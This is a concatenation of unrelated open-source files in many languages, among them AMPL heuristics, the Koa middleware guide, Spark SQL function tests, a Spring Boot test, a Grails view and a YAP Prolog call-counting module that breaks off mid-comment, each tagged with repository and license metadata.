objective zfkt_cont; solve; # solve continuous problem
let performance_cont := sum{j in 1..Q} b[j]*f2[j];
let RAMused_cont :=(sum{i in 1..N} a[i]*x2[i])/A2;
display x2; # show column selection
display performance_cont, RAMused_cont;
display N, Q, _solve_elapsed_time;
#end;
######## Definition of Numerical Allocation Strategies ##########
#### (H1) most occurrences - best g_i
set kmostused {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused[i+1] diff
{min{k in kmostused[i+1]:
g[k]=min{j in kmostused[i+1]} g[j]} k};
param use := if w>0 then max{k in 0..N: sum{j in kmostused[k]} a[j]<= w*A2} k;
param space {k in 0..N} := (sum{j in kmostused[k]} a[j]) / A2;
set order ordered default {}; for {i in 1..N} let order:=order union kmostused[i];;
######## (H2) best selectivity - best s_i
set kmostused2 {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused2[i+1] diff
{min{k in kmostused2[i+1]:
s[k]=max{j in kmostused2[i+1]} s[j]} k};
param use2 := if w>0 then max{k in 0..N: sum{j in kmostused2[k]} a[j]<= w*A2} k;
param space2 {k in 0..N} := (sum{j in kmostused2[k]} a[j]) / A2;
set order2 ordered default {}; for {i in 1..N} let order2:=order2 union kmostused2[i];;
######## (H3) best selectivity/occurrences ratio - best s_i/g_i
set kmostused3 {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused3[i+1] diff
{min{k in kmostused3[i+1]:
if g[k]>0 then s[k]/g[k] else 1 = max{j in kmostused3[i+1]} if g[j]>0 then s[j]/g[j] else 1} k};
param use3 := if w>0 then max{k in 0..N: sum{j in kmostused3[k]} a[j]<= w*A2} k;
param space3 {k in 0..N} := (sum{j in kmostused3[k]} a[j]) / A2;
set order3 ordered default {}; for {i in 1..N} let order3:=order3 union kmostused3[i];;
######## (H4) explicit solution via performance order
param S {i in 1..N,j in 1..Q:card(q[j] inter {i})=1} := prod{k in q[j]:s[k]<s[i]} s[k];
param p {i in 1..N} := (sum{j in 1..Q} if card(q[j] inter {i})=1 then b[j]*(dr-dd)*S[i,j]) + beta*(1-2*y[i]);
set kmostused4 {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused4[i+1] diff
{min{k in kmostused4[i+1]:
p[k]=max{j in kmostused4[i+1]} p[j]} k};
param use4 := if w>0 then max{k in 0..N: sum{j in kmostused4[k]} a[j]<= w*A2} k;
param space4 {k in 0..N} := (sum{j in kmostused4[k]} a[j]) / A2;
set order4 ordered default {}; for {i in 1..N} let order4:=order4 union kmostused4[i];;
######## (H1)-(H4) for a fixed single budget w ######
param performance_heu;
param performance_heu2;
param performance_heu3;
param performance_heu4;
param used_heu;
param used_heu2;
param used_heu3;
param used_heu4;
let w:= 0.2;
for {i in 1..N} let x[i]:=0; for {i in kmostused[use]} let x[i]:=1;
let performance_heu:= sum{j in 1..Q} b[j]*f[j];
let used_heu:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu, used_heu;
for {i in 1..N} let x[i]:=0; for {i in kmostused2[use2]} let x[i]:=1;
let performance_heu2:= sum{j in 1..Q} b[j]*f[j];
let used_heu2:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu2, used_heu2;
for {i in 1..N} let x[i]:=0; for {i in kmostused3[use3]} let x[i]:=1;
let performance_heu3:= sum{j in 1..Q} b[j]*f[j];
let used_heu3:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu3, used_heu3;
for {i in 1..N} let x[i]:=0; for {i in kmostused4[use4]} let x[i]:=1;
let performance_heu4:= sum{j in 1..Q} b[j]*f[j];
let used_heu4:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu4, used_heu4;
#end;
###### Strategies (H1)-(H4) for multiple budgets w ######
printf"" > results_out.txt;
for {k in 0..1 by 0.01} {let w:=k;
for {i in 1..N} let x[i]:=0; for {i in kmostused[use]} let x[i]:=1;
for {j in order diff kmostused[use]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu:= sum{j in 1..Q} b[j]*f[j];
let used_heu:=(sum{i in 1..N} a[i]*x[i])/A2;
for {i in 1..N} let x[i]:=0; for {i in kmostused2[use2]} let x[i]:=1;
for {j in order2 diff kmostused2[use2]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu2:= sum{j in 1..Q} b[j]*f[j];
let used_heu2:=(sum{i in 1..N} a[i]*x[i])/A2;
for {i in 1..N} let x[i]:=0; for {i in kmostused3[use3]} let x[i]:=1;
for {j in order3 diff kmostused3[use3]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu3:= sum{j in 1..Q} b[j]*f[j];
let used_heu3:=(sum{i in 1..N} a[i]*x[i])/A2;
for {i in 1..N} let x[i]:=0; for {i in kmostused4[use4]} let x[i]:=1;
for {j in order4 diff kmostused4[use4]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu4:= sum{j in 1..Q} b[j]*f[j];
let used_heu4:=(sum{i in 1..N} a[i]*x[i])/A2;
printf"%4.4f %8.2f %1.6f %8.2f %1.6f %8.2f %1.6f %8.2f %1.6f\n", w,
performance_heu, used_heu, performance_heu2, used_heu2,
performance_heu3, used_heu3, performance_heu4, used_heu4 >> results_out.txt;
};
end;
| AMPL | 5 | hpi-epic/column_selection_example | column_selection_example.ampl | [
"MIT"
] |
/**
* ImmedLearner.x10
*
* Rudra Distributed Learning Platform
*
* Copyright (c) IBM Corporation 2016
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of Rudra nor the names of its contributors may be used
* to endorse or promote products derived from this software without specific
* prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY,OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
package rudra;
import rudra.util.Logger;
import rudra.util.SwapBuffer;
import x10.util.concurrent.AtomicBoolean;
import x10.util.concurrent.Lock;
import x10.util.Team;
public class ImmedLearner(noTest:Boolean) extends Learner {
public def this(config:RudraConfig, confName:String, noTest:Boolean, spread:UInt,
nLearner:NativeLearner,
team:Team, logger:Logger, lt:Int, solverType:String) {
super(config, confName, spread, nLearner, team, logger, lt, solverType);
property(noTest);
}
// method called by reconciler thread.
val lock = new Lock();
def setTimeStamp(ts:UInt):void {
try {
lock.lock();
timeStamp = ts;
} finally {
lock.unlock();
}
}
def acceptGradientFromReconciler(g:TimedGradient) {
val includeMB = g.loadSize();
try {
lock.lock();
timeStamp = g.timeStamp;
} finally {
lock.unlock();
}
acceptGradients(g.grad, includeMB);
logger.info(()=>"Reconciler: delivered network gradient " + g + " to learner.");
}
def run(fromLearner:SwapBuffer[TimedGradient], done:AtomicBoolean) {
logger.info(()=>"Learner: started.");
var compG:TimedGradient = new TimedGradient(size);
compG.timeStamp = UInt.MAX_VALUE;
val testManager = (here.id==0) ? new TestManager(config, this.nLearner, noTest, solverType, lt) : null;
if (testManager != null) testManager.initialize();
val currentWeight = new TimedWeight(networkSize);
initWeights();
while (! done.get()) {
computeGradient(compG);
val loadSize = compG.loadSize();
compG=deliverGradient(compG, fromLearner);
// the reconciler will come in and update weights asynchronously
if (testManager != null) testManager.touch(loadSize);
} // while !done
if (testManager != null) testManager.finalize();
logger.info(()=>"Learner: Exited main loop.");
} //learner
}
// vim: shiftwidth=4:tabstop=4:expandtab
| X10 | 5 | milthorpe/rudra | x10/src/rudra/ImmedLearner.x10 | [
"BSD-3-Clause"
] |
# Guide
This guide covers Koa topics that are not directly API related, such as best practices for writing middleware and application structure suggestions. In these examples we use async functions as middleware - you can also use commonFunction or generatorFunction which will be a little different.
## Table of Contents
- [Guide](#guide)
- [Table of Contents](#table-of-contents)
- [Writing Middleware](#writing-middleware)
- [Middleware Best Practices](#middleware-best-practices)
- [Middleware options](#middleware-options)
- [Named middleware](#named-middleware)
- [Combining multiple middleware with koa-compose](#combining-multiple-middleware-with-koa-compose)
- [Response Middleware](#response-middleware)
- [Async operations](#async-operations)
- [Debugging Koa](#debugging-koa)
## Writing Middleware
Koa middleware are simple functions which return a `MiddlewareFunction` with signature (ctx, next). When
the middleware is run, it must manually invoke `next()` to run the "downstream" middleware.
For example if you wanted to track how long it takes for a request to propagate through Koa by adding an
`X-Response-Time` header field the middleware would look like the following:
```js
async function responseTime(ctx, next) {
const start = Date.now();
await next();
const ms = Date.now() - start;
ctx.set('X-Response-Time', `${ms}ms`);
}
app.use(responseTime);
```
If you're a front-end developer you can think any code before `next();` as the "capture" phase,
while any code after is the "bubble" phase. This crude gif illustrates how async function allow us
to properly utilize stack flow to implement request and response flows:

1. Create a date to track response time
2. Await control to the next middleware
3. Create another date to track duration
4. Await control to the next middleware
5. Set the response body to "Hello World"
6. Calculate duration time
7. Output log line
8. Calculate response time
9. Set `X-Response-Time` header field
10. Hand off to Koa to handle the response
Next we'll look at the best practices for creating Koa middleware.
## Middleware Best Practices
This section covers middleware authoring best practices, such as middleware
accepting options, named middleware for debugging, among others.
### Middleware options
When creating a public middleware, it's useful to conform to the convention of
wrapping the middleware in a function that accepts options, allowing users to
extend functionality. Even if your middleware accepts _no_ options, this is still
a good idea to keep things uniform.
Here our contrived `logger` middleware accepts a `format` string for customization,
and returns the middleware itself:
```js
function logger(format) {
format = format || ':method ":url"';
return async function (ctx, next) {
const str = format
.replace(':method', ctx.method)
.replace(':url', ctx.url);
console.log(str);
await next();
};
}
app.use(logger());
app.use(logger(':method :url'));
```
### Named middleware
Naming middleware is optional, however it's useful for debugging purposes to assign a name.
```js
function logger(format) {
return async function logger(ctx, next) {
};
}
```
### Combining multiple middleware with koa-compose
Sometimes you want to "compose" multiple middleware into a single middleware for easy re-use or exporting. You can use [koa-compose](https://github.com/koajs/compose)
```js
const compose = require('koa-compose');
async function random(ctx, next) {
if ('/random' == ctx.path) {
ctx.body = Math.floor(Math.random() * 10);
} else {
await next();
}
};
async function backwards(ctx, next) {
if ('/backwards' == ctx.path) {
ctx.body = 'sdrawkcab';
} else {
await next();
}
}
async function pi(ctx, next) {
if ('/pi' == ctx.path) {
ctx.body = String(Math.PI);
} else {
await next();
}
}
const all = compose([random, backwards, pi]);
app.use(all);
```
### Response Middleware
Middleware that decide to respond to a request and wish to bypass downstream middleware may
simply omit `next()`. Typically this will be in routing middleware, but this can be performed by
any. For example the following will respond with "two", however all three are executed, giving the
downstream "three" middleware a chance to manipulate the response.
```js
app.use(async function (ctx, next) {
console.log('>> one');
await next();
console.log('<< one');
});
app.use(async function (ctx, next) {
console.log('>> two');
ctx.body = 'two';
await next();
console.log('<< two');
});
app.use(async function (ctx, next) {
console.log('>> three');
await next();
console.log('<< three');
});
```
The following configuration omits `next()` in the second middleware, and will still respond
with "two", however the third (and any other downstream middleware) will be ignored:
```js
app.use(async function (ctx, next) {
console.log('>> one');
await next();
console.log('<< one');
});
app.use(async function (ctx, next) {
console.log('>> two');
ctx.body = 'two';
console.log('<< two');
});
app.use(async function (ctx, next) {
console.log('>> three');
await next();
console.log('<< three');
});
```
When the furthest downstream middleware executes `next();`, it's really yielding to a noop
function, allowing the middleware to compose correctly anywhere in the stack.
## Async operations
Async function and promise forms Koa's foundation, allowing
you to write non-blocking sequential code. For example this middleware reads the filenames from `./docs`,
and then reads the contents of each markdown file in parallel before assigning the body to the joint result.
```js
const fs = require('mz/fs');
app.use(async function (ctx, next) {
const paths = await fs.readdir('docs');
const files = await Promise.all(paths.map(path => fs.readFile(`docs/${path}`, 'utf8')));
ctx.type = 'markdown';
ctx.body = files.join('');
});
```
## Debugging Koa
Koa along with many of the libraries it's built with support the __DEBUG__ environment variable from [debug](https://github.com/visionmedia/debug) which provides simple conditional logging.
For example
to see all Koa-specific debugging information just pass `DEBUG=koa*` and upon boot you'll see the list of middleware used, among other things.
```
$ DEBUG=koa* node --harmony examples/simple
koa:application use responseTime +0ms
koa:application use logger +4ms
koa:application use contentLength +0ms
koa:application use notfound +0ms
koa:application use response +0ms
koa:application listen +0ms
```
Since JavaScript does not allow defining function names at
runtime, you can also set a middleware's name as `._name`.
This is useful when you don't have control of a middleware's name.
For example:
```js
const path = require('path');
const serve = require('koa-static');
const publicFiles = serve(path.join(__dirname, 'public'));
publicFiles._name = 'static /public';
app.use(publicFiles);
```
Now, instead of just seeing "serve" when debugging, you will see:
```
koa:application use static /public +0ms
```
| Markdown | 5 | VBetsun/koa | docs/guide.md | [
"MIT"
] |
include "stdio.sl";
include "sys.sl";
# TODO: [bug] suport numbers > 16-bit
var showstat = func(name) {
var statbuf = [0,0,0,0];
var n = stat(name, statbuf);
if (n < 0) {
fprintf(2, "stat: %s: %s\n", [name, strerror(n)]);
return 0;
};
var typch = 'f';
if (*statbuf == 0) typch = 'd';
printf("%c %u\t%u\t%u\t%s\n", [typch, statbuf[1], statbuf[2], statbuf[3], name]);
};
var args = cmdargs()+1;
if (!*args) {
fputs(2, "usage: stat NAME...\n");
exit(1);
};
while (*args) {
showstat(*args);
args++;
};
| Slash | 4 | jes/scamp-cpu | sys/stat.sl | [
"Unlicense"
] |
[Desktop Entry]
Name=Raiden
Version=XXVERSIONXX
Exec=raiden
Icon=raiden
Type=Application
StartupNotify=true
| desktop | 2 | karlb/raiden | docker/raiden.desktop | [
"MIT"
] |
-- test for misc functions
-- typeof
select typeof(null);
select typeof(true);
select typeof(1Y), typeof(1S), typeof(1), typeof(1L);
select typeof(cast(1.0 as float)), typeof(1.0D), typeof(1.2);
select typeof(date '1986-05-23'), typeof(timestamp '1986-05-23'), typeof(interval '23 days');
select typeof(x'ABCD'), typeof('SPARK');
select typeof(array(1, 2)), typeof(map(1, 2)), typeof(named_struct('a', 1, 'b', 'spark'));
-- Spark-32793: Rewrite AssertTrue with RaiseError
SELECT assert_true(true), assert_true(boolean(1));
SELECT assert_true(false);
SELECT assert_true(boolean(0));
SELECT assert_true(null);
SELECT assert_true(boolean(null));
SELECT assert_true(false, 'custom error message');
CREATE TEMPORARY VIEW tbl_misc AS SELECT * FROM (VALUES (1), (8), (2)) AS T(v);
SELECT raise_error('error message');
SELECT if(v > 5, raise_error('too big: ' || v), v + 1) FROM tbl_misc;
| SQL | 4 | kesavanvt/spark | sql/core/src/test/resources/sql-tests/inputs/misc-functions.sql | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
% A simple Hello Git implemented in MatLab
% also has a weird syntax
% or a very simple one
x = 'Hello Git'
disp(x) % ouputs Hello Git
% Going with the OOP style
classdef hello
methods
function greet(this)
disp('Hello Git')
end
end
end
| Matlab | 4 | bones97/Prog_langSyntax | Matlab.matlab | [
"Apache-2.0"
] |
FROM mhart/alpine-node:12
COPY . .
EXPOSE 8095
RUN yarn
RUN yarn build
CMD ["yarn", "start"]
| Dockerfile | 4 | ahmadiqbal1/vuetify | Dockerfile | [
"MIT"
] |
/*
* Copyright 2012-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.autoconfigure;
import java.util.List;
import org.junit.jupiter.api.Test;
import org.springframework.boot.autoconfigure.packagestest.one.FirstConfiguration;
import org.springframework.boot.autoconfigure.packagestest.two.SecondConfiguration;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
import org.springframework.context.annotation.Configuration;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatIllegalStateException;
/**
* Tests for {@link AutoConfigurationPackages}.
*
* @author Phillip Webb
* @author Oliver Gierke
*/
@SuppressWarnings("resource")
class AutoConfigurationPackagesTests {
@Test
void setAndGet() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(
ConfigWithAutoConfigurationPackage.class);
assertThat(AutoConfigurationPackages.get(context.getBeanFactory()))
.containsExactly(getClass().getPackage().getName());
}
@Test
void getWithoutSet() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(EmptyConfig.class);
assertThatIllegalStateException().isThrownBy(() -> AutoConfigurationPackages.get(context.getBeanFactory()))
.withMessageContaining("Unable to retrieve @EnableAutoConfiguration base packages");
}
@Test
void detectsMultipleAutoConfigurationPackages() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(FirstConfiguration.class,
SecondConfiguration.class);
List<String> packages = AutoConfigurationPackages.get(context.getBeanFactory());
Package package1 = FirstConfiguration.class.getPackage();
Package package2 = SecondConfiguration.class.getPackage();
assertThat(packages).containsOnly(package1.getName(), package2.getName());
}
@Test
void whenBasePackagesAreSpecifiedThenTheyAreRegistered() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(
ConfigWithAutoConfigurationBasePackages.class);
List<String> packages = AutoConfigurationPackages.get(context.getBeanFactory());
assertThat(packages).containsExactly("com.example.alpha", "com.example.bravo");
}
@Test
void whenBasePackageClassesAreSpecifiedThenTheirPackagesAreRegistered() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(
ConfigWithAutoConfigurationBasePackageClasses.class);
List<String> packages = AutoConfigurationPackages.get(context.getBeanFactory());
assertThat(packages).containsOnly(FirstConfiguration.class.getPackage().getName(),
SecondConfiguration.class.getPackage().getName());
}
@Configuration(proxyBeanMethods = false)
@AutoConfigurationPackage
static class ConfigWithAutoConfigurationPackage {
}
@Configuration(proxyBeanMethods = false)
@AutoConfigurationPackage(basePackages = { "com.example.alpha", "com.example.bravo" })
static class ConfigWithAutoConfigurationBasePackages {
}
@Configuration(proxyBeanMethods = false)
@AutoConfigurationPackage(basePackageClasses = { FirstConfiguration.class, SecondConfiguration.class })
static class ConfigWithAutoConfigurationBasePackageClasses {
}
@Configuration(proxyBeanMethods = false)
static class EmptyConfig {
}
}
| Java | 5 | techAi007/spring-boot | spring-boot-project/spring-boot-autoconfigure/src/test/java/org/springframework/boot/autoconfigure/AutoConfigurationPackagesTests.java | [
"Apache-2.0"
] |
--TEST--
bcpow() does not support exponents >= 2**63
--EXTENSIONS--
bcmath
--FILE--
<?php
try {
var_dump(bcpow('0', '9223372036854775808', 2));
} catch (\ValueError $e) {
echo $e->getMessage() . \PHP_EOL;
}
?>
--EXPECT--
bcpow(): Argument #2 ($exponent) is too large
| PHP | 3 | NathanFreeman/php-src | ext/bcmath/tests/bcpow_error2.phpt | [
"PHP-3.01"
] |
insert into book values(1, 'The Tartar Steppe');
insert into book values(2, 'Poem Strip');
insert into book values(3, 'Restless Nights: Selected Stories of Dino Buzzati'); | SQL | 3 | DBatOWL/tutorials | persistence-modules/spring-boot-persistence/src/test/resources/import_books.sql | [
"MIT"
] |
<%--
Copyright 2012 Netflix, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="layout" content="main"/>
<title>${alarm.alarmName} Alarm</title>
</head>
<body>
<div class="body">
<h1>Alarm Details</h1>
<g:if test="${flash.message}">
<div class="message">${flash.message}</div>
</g:if>
<div class="buttons">
<g:form class="validate">
<input type="hidden" name="id" value="${alarm.alarmName}"/>
<g:link class="edit keep" action="edit" id="${alarm.alarmName}">Edit Alarm</g:link>
<g:buttonSubmit class="delete" action="delete" value="Delete Alarm" data-warning="Really delete Alarm '${alarm.alarmName}'?"/>
</g:form>
</div>
<div>
<table>
<tbody>
<tr class="prop">
<td class="name">Name:</td>
<td class="value">${alarm.alarmName}</td>
</tr>
<tr class="prop">
<td class="name">Policy:</td>
<td class="value">
<g:each var="policy" in="${policies}">
<div><g:linkObject type="scalingPolicy" name="${policy}"/></div>
</g:each>
</td>
</tr>
<tr class="prop">
<td class="name">Dimensions:</td>
<td class="value">
<g:render template="dimensions" model="[dimensions: alarm.dimensions,showAsgText: true]"/>
</td>
</tr>
<g:render template="alarmDetails" />
<tr class="prop">
<td class="name">State Value:</td>
<td class="value">${alarm.stateValue}</td>
</tr>
<tr class="prop">
<td class="name">State Reason:</td>
<td class="value">${alarm.stateReason}</td>
</tr>
<tr class="prop">
<td class="name">State Reason Data:</td>
<td class="value">${alarm.stateReasonData}</td>
</tr>
<tr class="prop">
<td class="name">State Updated Time:</td>
<td class="value"><g:formatDate date="${alarm.stateUpdatedTimestamp}"/></td>
</tr>
<tr class="prop">
<td class="name">Unit:</td>
<td class="value">${alarm.unit}</td>
</tr>
<tr class="prop">
<td class="name">Amazon Resource Locator (ARN):</td>
<td class="value">${alarm.alarmArn}</td>
</tr>
<tr class="prop">
<td class="name">Actions Enabled:</td>
<td class="value">${alarm.actionsEnabled}</td>
</tr>
<tr class="prop">
<td class="name">Actions:</td>
<td class="value">
<ul>
<g:each var="alarmAction" in="${alarm.alarmActions}">
<li>${alarmAction}</li>
</g:each>
</ul>
</td>
</tr>
<tr class="prop">
<td class="name">OK Actions:</td>
<td class="value">${alarm.getOKActions()}</td>
</tr>
<tr class="prop">
<td class="name">Insufficient Data Actions:</td>
<td class="value">${alarm.insufficientDataActions}</td>
</tr>
<tr class="prop">
<td class="name">Config Updated Time:</td>
<td class="value"><g:formatDate date="${alarm.alarmConfigurationUpdatedTimestamp}"/></td>
</tr>
</tbody>
</table>
</div>
</div>
</body>
</html>
| Groovy Server Pages | 3 | Threadless/asgard | grails-app/views/alarm/show.gsp | [
"Apache-2.0"
] |
// all of these are valid
var x: any;
var a: number = x;
var b: boolean = x;
var c: string = x;
var d: void = x;
var e = null;
e = x;
var f = undefined;
f = x;
enum E {
A
}
var g: E = x;
var g2 = E.A;
g2 = x;
class C {
foo: string;
}
var h: C = x;
interface I {
foo: string;
}
var i: I = x;
var j: { (): string } = x;
var j2: { <T>(x: T): string } = x;
module M {
export var foo = 1;
}
M = x;
function k<T>(a: T) {
a = x;
} | TypeScript | 3 | nilamjadhav/TypeScript | tests/cases/conformance/types/any/assignAnyToEveryType.ts | [
"Apache-2.0"
] |
/**
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
// #docregion Reactive
import {Component} from '@angular/core';
import {FormControl, FormGroup} from '@angular/forms';
@Component({
selector: 'example-app',
template: `
<form [formGroup]="form">
<input type="radio" formControlName="food" value="beef" > Beef
<input type="radio" formControlName="food" value="lamb"> Lamb
<input type="radio" formControlName="food" value="fish"> Fish
</form>
<p>Form value: {{ form.value | json }}</p> <!-- {food: 'lamb' } -->
`,
})
export class ReactiveRadioButtonComp {
form = new FormGroup({
food: new FormControl('lamb'),
});
}
// #enddocregion
| TypeScript | 4 | raghavendramohan/angular | packages/examples/forms/ts/reactiveRadioButtons/reactive_radio_button_example.ts | [
"MIT"
] |
#version 120
// Input vertex attributes (from vertex shader)
varying vec2 fragTexCoord;
varying vec4 fragColor;
// Input uniform values
uniform sampler2D texture0;
uniform vec4 colDiffuse;
// NOTE: Add here your custom variables
uniform vec2 resolution = vec2(800, 450);
void main()
{
// Texel color fetching from texture sampler
vec4 texelColor = texture2D(texture0, fragTexCoord);
// NOTE: Implement here your fragment shader code
gl_FragColor = texelColor*colDiffuse;
} | F# | 4 | chrisws/raylib | examples/shaders/resources/shaders/glsl120/base.fs | [
"Zlib"
] |
extends RigidBody2D
var _picked = false
var _last_mouse_pos = Vector2.ZERO
func _ready():
input_pickable = true
func _input(event):
var mouse_event = event as InputEventMouseButton
if mouse_event and not mouse_event.pressed:
_picked = false
func _input_event(_viewport, event, _shape_idx):
var mouse_event = event as InputEventMouseButton
if mouse_event and mouse_event.pressed:
_picked = true
_last_mouse_pos = get_global_mouse_position()
func _physics_process(delta):
if _picked:
var mouse_pos = get_global_mouse_position()
if mode == MODE_STATIC:
global_position = mouse_pos
else:
linear_velocity = (mouse_pos - _last_mouse_pos) / delta
_last_mouse_pos = mouse_pos
| GDScript | 4 | jonbonazza/godot-demo-projects | 2d/physics_tests/utils/rigidbody_pick.gd | [
"MIT"
] |
(assert (str.suffixof "def" "abcdef"))
(check-sat)
| SMT | 3 | mauguignard/cbmc | regression/smt2_strings/suffixof_const_sat/suffixof_const_sat.smt2 | [
"BSD-4-Clause"
] |
%YAML 1.1
# ROS Dockerfile database
---
images:
ros-core:
base_image: @(os_name):@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_core_image.Dockerfile.em
entrypoint_name: docker_images/ros_entrypoint.sh
template_packages:
- docker_templates
ros_packages:
- ros-core
ros-base:
base_image: @(user_name):@(rosdistro_name)-ros-core-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- ros-base
bootstrap_ros_tools:
robot:
base_image: @(user_name):@(rosdistro_name)-ros-base-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- robot
perception:
base_image: @(user_name):@(rosdistro_name)-ros-base-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- perception
desktop:
base_image: @(user_name):@(rosdistro_name)-robot-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- desktop
desktop-full:
base_image: osrf/@(user_name):@(rosdistro_name)-desktop-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- desktop-full
| EmberScript | 3 | christophebedard/docker_images-1 | ros/noetic/ubuntu/focal/images.yaml.em | [
"Apache-2.0"
] |
/*************************************************************************
* *
* YAP Prolog *
* *
* Yap Prolog was developed at NCCUP - Universidade do Porto *
* *
* Copyright L.Damas, V.S.Costa and Universidade do Porto 1985-1997 *
* *
**************************************************************************
* *
* File: callcount.yap *
* Last rev: 8/2/02 *
* mods: *
* comments: Some profiling predicates available in yap *
* *
*************************************************************************/
/**
* @file callcount.yap
* @short support call counting.
*
* @defgroup Profiling Profiling Prolog Programs
* @brief the clock and the tick profilers.
* @ingroup extensions
* @{
*
* YAP includes two profilers. The count profiler keeps information on the
* number of times a predicate was called. This information can be used to
* detect what are the most commonly called predicates in the program. The
* count profiler can be compiled by setting YAP's flag profiling
* to `on`. The time-profiler is a `gprof` profiler, and counts
* how many ticks are being spent on specific predicates, or on other
* system functions such as internal data-base accesses or garbage collects.
*
* + Call_Counting
* +
*
*/
/**
@}
*/
/**
* @defgroup Call_Counting Counting Calls
* @ingroup Profiling
* @{
*
* Predicates compiled with YAP's flag call_counting set to
* `on` update counters on the numbers of calls and of
* retries. Counters are actually decreasing counters, so that they can be
* used as timers. Three counters are available:
*
* + `calls`: number of predicate calls since execution started or since
* system was reset;
* + `retries`: number of retries for predicates called since
* execution started or since counters were reset;
* + `calls_and_retries`: count both on predicate calls and
* retries.
*
* These counters can be used to find out how many calls a certain
* goal takes to execute. They can also be used as timers.
*
* The code for the call counters piggybacks on the profiling
* code. Therefore, activating the call counters also activates the profiling
* counters.
*
* These are the predicates that access and manipulate the call counters.
* */
:- system_module( '$_callcount', [call_count/3,
call_count_data/3,
call_count_reset/0], []).
:- use_system_module( '$_errors', ['$do_error'/2]).
/** @pred call_count_data(- _Calls_, - _Retries_, - _CallsAndRetries_)
*
*
* Give current call count data. The first argument gives the current value
* for the _Calls_ counter, next the _Retries_ counter, and last
* the _CallsAndRetries_ counter.
*
* */
call_count_data(Calls, Retries, Both) :-
'$call_count_info'(Calls, Retries, Both).
/** @pred call_count_reset
*
*
* Reset call count counters. All timers are also reset.
*
*/
call_count_reset :-
'$call_count_reset'.
/** @pred call_count(? _CallsMax_, ? _RetriesMax_, ? _CallsAndRetriesMax_)
*
*
* Set call counters as timers. YAP will generate an exception
* if one of the instantiated call counters decreases to 0:
*
